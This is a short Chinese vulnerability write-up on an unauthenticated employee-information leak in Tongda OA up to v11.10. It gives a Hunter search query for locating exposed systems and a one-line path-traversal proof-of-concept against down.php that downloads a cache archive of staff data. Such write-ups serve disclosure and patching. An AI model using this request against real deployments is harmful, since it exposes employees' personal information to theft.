登录 白背景

通达OA down 未授权员工信息泄露漏洞

一、漏洞简介

通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA down 未授权员工信息泄露漏洞。

二、影响版本

  • 通达OA2017-v11.10

三、资产测绘

  • hunter:app.name="通达 OA"

image.png

  • 登录页面

image.png

四、漏洞复现

通过poc下载文件

/inc/package/down.php?id=../../../cache/org

image.png
解压后即可看到员工信息
image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/sy910vqd202abgvx